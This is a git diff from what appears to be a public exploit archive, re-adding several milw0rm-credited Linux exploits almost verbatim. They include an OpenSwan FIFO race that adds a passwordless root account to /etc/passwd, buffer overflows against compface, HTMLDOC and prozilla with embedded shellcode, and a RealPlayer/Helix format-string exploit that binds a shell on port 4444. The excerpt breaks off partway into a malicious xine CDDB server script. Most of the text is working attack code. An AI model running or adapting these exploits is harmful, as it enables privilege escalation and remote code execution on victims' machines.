-# immediately echo your command into the fifo which was empty again and viola, it
-# gets executed, because the sh binary needs a few milliseconds to get loaded,
-# it's a typical race condition.
-#
-# problem:
-# you need to trick root to execute "ipsec livetest", and this script needs to run in background...
-#
-# I don't want no fame for this as it is ripped from Gentoo bug 238574, thanks
-#
-
-mkfifo /tmp/ipseclive.conn
-cat /tmp/ipseclive.conn
-echo 'echo t00r::0:0::/tmp:/bin/sh>>/etc/passwd' > /tmp/ipseclive.conn
-rm /tmp/ipseclive.conn
-su -l t00r
-
-# milw0rm.com [2009-07-13]
+#!/bin/bash
+# uglyswan - OpenSwan local root exploit (CVE-2008-4190)
+#
+# description:
+# The IPSEC livetest tool in Openswan 2.4.12 and earlier, and 2.6.x through 2.6.16,
+# allows local users to overwrite arbitrary files and execute arbitrary code via a
+# symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files.
+# NOTE: in many distributions and the upstream version, this tool has been disabled.
+# +# vulnerable code: +# wget -o /dev/null -O /tmp/ipseclive.conn "http://192.168.0.1/olts/?leftid=$leftid&$leftrsasigkey&version=$version" +# sh < /tmp/ipseclive.conn +# +# the exploit: +# cat waits for the input from wget to the fifo and after it received it, you +# immediately echo your command into the fifo which was empty again and viola, it +# gets executed, because the sh binary needs a few milliseconds to get loaded, +# it's a typical race condition. +# +# problem: +# you need to trick root to execute "ipsec livetest", and this script needs to run in background... +# +# I don't want no fame for this as it is ripped from Gentoo bug 238574, thanks +# + +mkfifo /tmp/ipseclive.conn +cat /tmp/ipseclive.conn +echo 'echo t00r::0:0::/tmp:/bin/sh>>/etc/passwd' > /tmp/ipseclive.conn +rm /tmp/ipseclive.conn +su -l t00r + +# milw0rm.com [2009-07-13] diff --git a/platforms/linux/local/914.c b/platforms/linux/local/914.c index 141ded52c..78a49a840 100755 --- a/platforms/linux/local/914.c +++ b/platforms/linux/local/914.c @@ -46,6 +46,6 @@ int main(int argc, char *argv[]) { return 0; -} - -// milw0rm.com [2005-04-05] +} + +// milw0rm.com [2005-04-05] diff --git a/platforms/linux/local/924.c b/platforms/linux/local/924.c index 644c8d592..7cc5d501d 100755 --- a/platforms/linux/local/924.c +++ b/platforms/linux/local/924.c @@ -48,6 +48,6 @@ memcpy(buffer+i,shellcode,strlen(shellcode)); execlp("/sbin/sash","sash","-c",buffer); return 0; -} - -// milw0rm.com [2005-04-08] +} + +// milw0rm.com [2005-04-08] diff --git a/platforms/linux/local/9302.py b/platforms/linux/local/9302.py index eba67feb7..f636fdc46 100755 --- a/platforms/linux/local/9302.py +++ b/platforms/linux/local/9302.py 
@@ -1,41 +1,41 @@
-#!/usr/bin/python
-#[*] Exploit : Compface '.xbm' Local Buffer Overflow Exploit
-#[*] Affected : compface 1.1.5
-#[*] Tested on : Ubuntu 9.04 (without stack randomization)
-#[*] Refer : bid/35863
-#[*] Exploit : His0k4
-
-#[*] Use : $compface exploit.xbm out
-
-#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
-#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
-shellcode=(
-"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42"
-"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f"
-"\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b"
-"\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50"
-"\x45\x5a\x41\x41")
-
-payload = "#define noname_width 48\r\n"
-payload += "#define noname_height 48\r\n"
-payload += "static\r\n"
-payload += "\x90"*180
-payload += "\x80\xf4\xff\xbf" #$esp+10h
-payload += "\x90"*16
-payload += shellcode
-payload += "\r\n"
-payload += "char = {\r\n"
-
-try:
- out_file = open("exploit.xbm","w")
- out_file.write(payload)
- out_file.close()
- print("\nExploit file created!\n")
-except:
- print "Error"
-
-# milw0rm.com [2009-07-30]
+#!/usr/bin/python
+#[*] Exploit : Compface '.xbm' Local Buffer Overflow Exploit
+#[*] Affected : compface 1.1.5
+#[*] Tested on : Ubuntu 9.04 (without stack randomization)
+#[*] Refer : bid/35863
+#[*] Exploit : His0k4
+
+#[*] Use : $compface exploit.xbm out
+
+#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
+#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
+shellcode=(
+"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42"
+"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f"
+"\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b"
+"\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50"
+"\x45\x5a\x41\x41")
+
+payload = "#define noname_width 48\r\n"
+payload += "#define noname_height 48\r\n"
+payload += "static\r\n"
+payload += "\x90"*180
+payload += "\x80\xf4\xff\xbf" #$esp+10h
+payload += "\x90"*16
+payload += shellcode
+payload += "\r\n"
+payload += "char = {\r\n"
+
+try:
+ out_file = open("exploit.xbm","w")
+ out_file.write(payload)
+ out_file.close()
+ print("\nExploit file created!\n")
+except:
+ print "Error"
+
+# milw0rm.com [2009-07-30]
diff --git a/platforms/linux/local/950.c b/platforms/linux/local/950.c
index ab80c087c..1b1c376db 100755
--- a/platforms/linux/local/950.c
+++ b/platforms/linux/local/950.c
@@ -97,6 +97,6 @@ int main(int argc, char *argv[])
 }
 exit (0);
-}
-
-// milw0rm.com [2005-04-21]
+}
+
+// milw0rm.com [2005-04-21]
diff --git a/platforms/linux/local/9595.c b/platforms/linux/local/9595.c
index e8a360c52..886ecf4e1 100755
--- a/platforms/linux/local/9595.c
+++ b/platforms/linux/local/9595.c
@@ -1,81 +1,81 @@ -/* - -HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) -Reference: http://www.securityfocus.com/bid/35727 - -Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) -Credit: ANTHRAX666 for finding the vulnerability - -Coded by Pankaj Kohli -http://www.pank4j.com - -pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space -2 -pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f -pankaj@zion:~/test/htmldoc$ ./htmldocb0f - -[*] Creating buffer -[*] Exploit file written to sploit.html -Run as: htmldoc -f somefile.pdf sploit.html - -pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 -pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html & -[1] 3287 -pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 -tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN - -*/ - -#include -#include - - -/* Port binding (xor encoded) shellcode (port 4444) */ -char code[] = -"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" -"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" -"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" -"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" -"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" -"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" -"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" -"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" -"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" -"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" -"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" -"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" -"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" -"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" -"\xd3\x9e"; - -long jmp = 0x0804d938; // push esp; ret 0x0807; ;-) - -int main(int argc, char **argv, char **envp) { - char buff[512]; - int i; - FILE *fd; - - printf("\n[*] Creating buffer\n"); - strcpy(buff, "[Frame 11 EBP]--points to-->[Frame 12 EBP] - - And can be manipulated something like so: - - -------- -------- -------- - Frame 10 Frame 11 Frame 12 - -------- -------- -------- - 1|------------\/ - [LSBMSB] [LSBMSB]-- 
[41414141] - 2|____________^ 3|__________^ - - Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x00000000. - - So what else can I do? - - How about use the fact the file being played is under my control and only the MSB needs overwritten. This - solves the problem with the size of the valaue I can write. It is possible to modify the MSB of an EBP - that is reachable, eventually leading to EIP pointing at some good location after "mov %ebp,%esp" happens, - resulting in the execution of our shellcode. - - 1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp - 2-> Overwrite EBP MSB with the address of the file location on the stack - 3-> EBP is moved to ESP - 4-> EIP is changed to ESP value - 5-> EIP is owned, shell is spawned - - Granted this is not a stable method as the user can freely manipulate their environment, and we use the - file name, which is stored in an environment variable to trampoline us to the shellcode. However my goal - here is not to create a worm but a proof-of-concept :p - - The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in /usr/local/RealPlayer - and run as shown below. 
- - Sample local run: - - Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold - - Window 1: - --------- - c0ntex@debauch:~$ netstat -an --ip - Active Internet connections (servers and established) - Proto Recv-Q Send-Q Local Address Foreign Address State - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 192.168.88.133:22 192.168.88.1:2080 ESTABLISHED - udp 0 0 0.0.0.0:68 0.0.0.0:* - c0ntex@debauch:~$ ./helix4real - - Remote format string exploit POC for UNIX RealPlayer && HelixPlayer - Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version - by c0ntex || c0ntexb@gmail.com || http://www.open-security.org - - [-] Creating file [VY~Ò.rp] - [-] Using [148] stack pops - [-] Modifying EBP MSB with value [64105] - [-] Completed creation of test file! - [-] Executing RealPlayer now... - [-] Connecting to shell in 10 seconds - ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** - - (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() - - (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() - - ps -ef | tail -12; - ... - c0ntex 1631 1624 0 01:10 pts/2 00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp - c0ntex 1636 1631 4 01:10 pts/2 00:00:02 /bin//sh - c0ntex 1637 1636 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1638 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1639 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp - c0ntex 1640 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp - c0ntex 1641 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1642 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - c0ntex 1643 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp - ... - - To exploit this remotly, a user just needs to place the created file on a web site and provide a link so - users can click the file, launching RealPlayer and exploiting the vulnerability. 
- - Real have been duely informed about this issue and are fixing. Sadly though, it seems someone is trying to - pinch my research, as such I have been forced to release this advisory sooner than hoped. Until Real get - a new release out, do not play untrusted media with RealPlayer or HelixPlayer. Sorry Real.com! - - Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers. - - PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ http://www.open-security.org/adv.xml - is now available. - - */ - - -#include -#include -#include -#include - -#define BUFFER 10000 -#define EBPMSB 64105 -#define HOST "localhost" -#define NETCAT "/bin/nc" -#define NOPS 0x90 -#define STACKPOP 148 -#define VULN "/usr/local/RealPlayer/realplay" - -char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70"; - -/* metasploit port binding shellcode = 4444 */ -char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66" - "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52" - "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a" - "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80" - "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56" - "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a" - "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9" - "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68" - "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" - "\xe1\xcd\x80"; - - -int -filegen(char *shellcode) -{ - FILE *rp; - - printf("[-] Creating file [%s]\n", filename); - - rp = fopen(filename, "w"); - if(!rp) { - puts("[!] 
Could not fopen file!"); - free(shellcode); - return(EXIT_FAILURE); - } - - printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB); - - fprintf(rp, - "\n" - "\n" - "\n" - "\n" - "", EBPMSB, STACKPOP, shellcode); - fclose(rp); - - free(shellcode); shellcode = NULL; - - return(EXIT_SUCCESS); -} - - -int -main(int argc, char **argv) -{ - char *shellcode = NULL; - - puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer"); - puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version"); - puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n"); - - shellcode = (char *)malloc(BUFFER); - if(!shellcode) { - puts("[!] Could not malloc"); - return(EXIT_FAILURE); - } - - memset(shellcode, NOPS, BUFFER); - memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode)); - shellcode[BUFFER] = '\0'; - - filegen(shellcode); - - puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now..."); - - switch(fork()) { - case -1: - puts("[!] Could not fork off, bailing!"); - return(EXIT_FAILURE); - case 0: - if(execl(VULN, "realplay", filename, NULL) <0) { - puts("[!] Could not execute realplayer... :("); - return(EXIT_FAILURE); - } - } - - puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **"); - sleep(10); - - if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) { - puts("[!] 
Could not connect, check the core file!"); - return(EXIT_FAILURE); - } - - return(EXIT_SUCCESS); -} - -// milw0rm.com [2005-09-26] + /* + ***************************************************************************************************************** + $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit + ***************************************************************************************************************** + 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com + 2: Bug Released: September 26th 2005 + 3: Bug Impact Rate: Hi + 4: Bug Scope Rate: Remote + ***************************************************************************************************************** + $ This advisory and/or proof of concept code must not be used for commercial gain. + ***************************************************************************************************************** + + UNIX RealPlayer && Helix Player + http://real.com + http://helixcommunity.org + + "The Helix Player is the Helix Community's open source media player for consumers. It is being developed + to have a rich and usable graphical interface and support a variety of open media formats like Ogg Vorbis, + Theora etc. + The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several + non-open source components including RealAudio/RealVideo, MP3 etc." + + There is a remotly exploitable format string vulnerability in the latest Helix Media Player suit that will + allow an attacker the possibility to execute malicious code on a victims computer. The exploit code will + execute a remote shell under the permissions of the user running the media player, and effects all versions + of RealPlayer and Helix Player. + + The bug is exploitable by abusing media, including .rp (relpix)and .rt (realtext) file formats. Although + others may be effected I stick to realpix file format for this advisory. 
+ + Almost all media file input is placed on the heap, so it's not possible to just pop our way to a supplied + string like with a normal stack based format bug, as such we can't directly modify GOT, DTORS, etc. leaving + us limited to what we can do. + + There are several places where we can control the flow of execution: + + popN - call *0x04(eax) - eax is controlled + popN+N - call *0x20(eax) - eax is controlled + popN+NN - call *0x100(edx) - edx is controlled + popN+NNN - ebp - ebp is controlled + popN+NNNN - eip - eip is controlled + .... + + however since we are limited to the size of the value that can be written, it doesn't seem possible to + point at a known good location directly. Since our shellcode is always mapped via the .rp file between + 0x0822**** - 0x082f**** and with control of one pointer at a time usually, we can not reach the LSB, we + are toast. + + In a phrack paper, Riq talks about using sections of the base pointer to create a 4 byte pointer by + chaining EBP like so: + + [Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP] + + And can be manipulated something like so: + + -------- -------- -------- + Frame 10 Frame 11 Frame 12 + -------- -------- -------- + 1|------------\/ + [LSBMSB] [LSBMSB]-- [41414141] + 2|____________^ 3|__________^ + + Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x00000000. + + So what else can I do? + + How about use the fact the file being played is under my control and only the MSB needs overwritten. This + solves the problem with the size of the valaue I can write. It is possible to modify the MSB of an EBP + that is reachable, eventually leading to EIP pointing at some good location after "mov %ebp,%esp" happens, + resulting in the execution of our shellcode. 
+ + 1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp + 2-> Overwrite EBP MSB with the address of the file location on the stack + 3-> EBP is moved to ESP + 4-> EIP is changed to ESP value + 5-> EIP is owned, shell is spawned + + Granted this is not a stable method as the user can freely manipulate their environment, and we use the + file name, which is stored in an environment variable to trampoline us to the shellcode. However my goal + here is not to create a worm but a proof-of-concept :p + + The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in /usr/local/RealPlayer + and run as shown below. + + Sample local run: + + Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold + + Window 1: + --------- + c0ntex@debauch:~$ netstat -an --ip + Active Internet connections (servers and established) + Proto Recv-Q Send-Q Local Address Foreign Address State + tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN + tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN + tcp 0 0 192.168.88.133:22 192.168.88.1:2080 ESTABLISHED + udp 0 0 0.0.0.0:68 0.0.0.0:* + c0ntex@debauch:~$ ./helix4real + + Remote format string exploit POC for UNIX RealPlayer && HelixPlayer + Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version + by c0ntex || c0ntexb@gmail.com || http://www.open-security.org + + [-] Creating file [VY~Ò.rp] + [-] Using [148] stack pops + [-] Modifying EBP MSB with value [64105] + [-] Completed creation of test file! + [-] Executing RealPlayer now... + [-] Connecting to shell in 10 seconds + ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** + + (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() + + (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text() + + ps -ef | tail -12; + ... 
+ c0ntex 1631 1624 0 01:10 pts/2 00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp + c0ntex 1636 1631 4 01:10 pts/2 00:00:02 /bin//sh + c0ntex 1637 1636 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1638 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1639 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp + c0ntex 1640 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp + c0ntex 1641 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1642 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + c0ntex 1643 1637 0 01:10 pts/2 00:00:00 ? ²úÿ¿f ? ?\ ? ? .rp + ... + + To exploit this remotly, a user just needs to place the created file on a web site and provide a link so + users can click the file, launching RealPlayer and exploiting the vulnerability. + + Real have been duely informed about this issue and are fixing. Sadly though, it seems someone is trying to + pinch my research, as such I have been forced to release this advisory sooner than hoped. Until Real get + a new release out, do not play untrusted media with RealPlayer or HelixPlayer. Sorry Real.com! + + Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers. + + PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ http://www.open-security.org/adv.xml + is now available. 
+ + */ + + +#include +#include +#include +#include + +#define BUFFER 10000 +#define EBPMSB 64105 +#define HOST "localhost" +#define NETCAT "/bin/nc" +#define NOPS 0x90 +#define STACKPOP 148 +#define VULN "/usr/local/RealPlayer/realplay" + +char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70"; + +/* metasploit port binding shellcode = 4444 */ +char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66" + "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52" + "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a" + "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80" + "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56" + "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a" + "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9" + "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68" + "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" + "\xe1\xcd\x80"; + + +int +filegen(char *shellcode) +{ + FILE *rp; + + printf("[-] Creating file [%s]\n", filename); + + rp = fopen(filename, "w"); + if(!rp) { + puts("[!] Could not fopen file!"); + free(shellcode); + return(EXIT_FAILURE); + } + + printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB); + + fprintf(rp, + "\n" + "\n" + "\n" + "\n" + "", EBPMSB, STACKPOP, shellcode); + fclose(rp); + + free(shellcode); shellcode = NULL; + + return(EXIT_SUCCESS); +} + + +int +main(int argc, char **argv) +{ + char *shellcode = NULL; + + puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer"); + puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version"); + puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n"); + + shellcode = (char *)malloc(BUFFER); + if(!shellcode) { + puts("[!] Could not malloc"); + return(EXIT_FAILURE); + } + + memset(shellcode, NOPS, BUFFER); + memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode)); + shellcode[BUFFER] = '\0'; + + filegen(shellcode); + + puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now..."); + + switch(fork()) { + case -1: + puts("[!] 
Could not fork off, bailing!"); + return(EXIT_FAILURE); + case 0: + if(execl(VULN, "realplay", filename, NULL) <0) { + puts("[!] Could not execute realplayer... :("); + return(EXIT_FAILURE); + } + } + + puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **"); + sleep(10); + + if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) { + puts("[!] Could not connect, check the core file!"); + return(EXIT_FAILURE); + } + + return(EXIT_SUCCESS); +} + +// milw0rm.com [2005-09-26] diff --git a/platforms/linux/remote/1238.c b/platforms/linux/remote/1238.c index d3f493a24..e3a55ff8e 100755 --- a/platforms/linux/remote/1238.c +++ b/platforms/linux/remote/1238.c @@ -1,47 +1,47 @@ -#include -#include -#include - -#define OVERFLOW (1<<10)+32 -#define SLEDSIZ (1<<10) -#define RETADDR 0x806977a+SLEDSIZ/2 -#define OUTPUT "AdvResults.asp" - -/* -* prozilla bug, found while auditing for gentoo bug #70090 -* -taviso@gentoo.org -*/ - -/* execve() /bin/id */ -unsigned char shellcode[] = -"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e" -"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3" -"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc" -"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07" -"\x9f\xcf\x2d\x8e"; - -int main(int argc, char **argv) -{ -unsigned char *buf; -void *ret = (void *) RETADDR; -FILE *exploit; -int i; - -exploit = fopen(OUTPUT, "w"); -fprintf(exploit, "
");
-
-buf = malloc(OVERFLOW);
-for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
-memcpy(buf + i, &ret, sizeof(void *));
-fwrite(buf, OVERFLOW, 1, exploit);
-fprintf(exploit, "
"); -buf = realloc(buf, SLEDSIZ + sizeof(shellcode)); -memset(buf, 0x90, SLEDSIZ); -memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode)); -fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit); -free(buf); -fprintf(stderr, "[*] %s created.\n", OUTPUT); -return 0; -} - -// milw0rm.com [2005-10-02] +#include +#include +#include + +#define OVERFLOW (1<<10)+32 +#define SLEDSIZ (1<<10) +#define RETADDR 0x806977a+SLEDSIZ/2 +#define OUTPUT "AdvResults.asp" + +/* +* prozilla bug, found while auditing for gentoo bug #70090 +* -taviso@gentoo.org +*/ + +/* execve() /bin/id */ +unsigned char shellcode[] = +"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e" +"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3" +"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc" +"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07" +"\x9f\xcf\x2d\x8e"; + +int main(int argc, char **argv) +{ +unsigned char *buf; +void *ret = (void *) RETADDR; +FILE *exploit; +int i; + +exploit = fopen(OUTPUT, "w"); +fprintf(exploit, "
");
+
+buf = malloc(OVERFLOW);
+for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
+memcpy(buf + i, &ret, sizeof(void *));
+fwrite(buf, OVERFLOW, 1, exploit);
+fprintf(exploit, "
"); +buf = realloc(buf, SLEDSIZ + sizeof(shellcode)); +memset(buf, 0x90, SLEDSIZ); +memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode)); +fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit); +free(buf); +fprintf(stderr, "[*] %s created.\n", OUTPUT); +return 0; +} + +// milw0rm.com [2005-10-02] diff --git a/platforms/linux/remote/1242.pl b/platforms/linux/remote/1242.pl index d8e5ecb0f..24f986cef 100755 --- a/platforms/linux/remote/1242.pl +++ b/platforms/linux/remote/1242.pl 
@@ -1,141 +1,141 @@ -#!/usr/bin/perl -- -# When playing an Audio CD, using xine-lib based media application, -# the library contacts a CDDB server to retrieve metadata like the -# title and artist's name. During processing of this data, a response -# from the server, which is located in memory on the stack, is passed -# to the fprintf() function as a format string. -# An attacker can set up a malicious CDDB server and trick the client -# into using this server instead of the pre-configured one. Alternatively, -# any user and therefore the attacker can modify entries in the official -# CDDB server. Using this format string vulnerability, attacker-chosen -# data can be written to an attacker-chosen memory location. This allows -# the attacker to alter the control flow and to execute malicious code with -# the permissions of the user running the application. -# Although it requires the user to play an Audio CD, this vulnerability can -# still be exploited remotely, because a xine Audio CD MRL -# (media resource locator) could be embedded into a website. Added for future ref. /str0ke - -# xine-cddb-server -# by Ulf Harnhammar in 2005 -# I hereby place this program in the public domain. 
- -use strict; -use IO::Socket; - -$main::port = 8880; -$main::timeout = 5; - - -# *** SUBROUTINES *** - - -sub mysend($$) -{ - my $file = shift; - my $str = shift; - - print $file "$str\n"; - print "SENT: $str\n"; -} # sub mysend - - -sub myreceive($) -{ - my $file = shift; - my $inp; - - eval - { - local $SIG{ALRM} = sub { die "alarm\n" }; - alarm $main::timeout; - $inp = <$file>; - alarm 0; - }; - - if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } - $inp =~ tr/\015\012\000//d; - print "RECEIVED: $inp\n"; - $inp; -} # sub myreceive - - -# *** MAIN PROGRAM *** - - -{ - my $server = IO::Socket::INET->new( Proto => 'tcp', - LocalPort => $main::port, - Listen => SOMAXCONN, - Reuse => 1); - die "can't set up server!\n" unless $server; - - - while (my $client = $server->accept()) - { - $client->autoflush(1); - print 'connection from '.$client->peerhost."\n"; - - - mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '. - scalar localtime); - - while (my $str = myreceive($client)) - { - if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i) - { - mysend($client, "200 Hello and welcome $1\@$2 running $3."); - next; - } - - if ($str =~ m/^proto (\d+)$/i) - { - mysend($client, "201 OK, CDDB protocol level now: $1"); - next; - } - - if ($str =~ m/^cddb query ([0-9a-f]+)/i) - { - mysend($client, "200 rock $1 Exploiters / Formatted and Stringed"); - next; - } - - if ($str 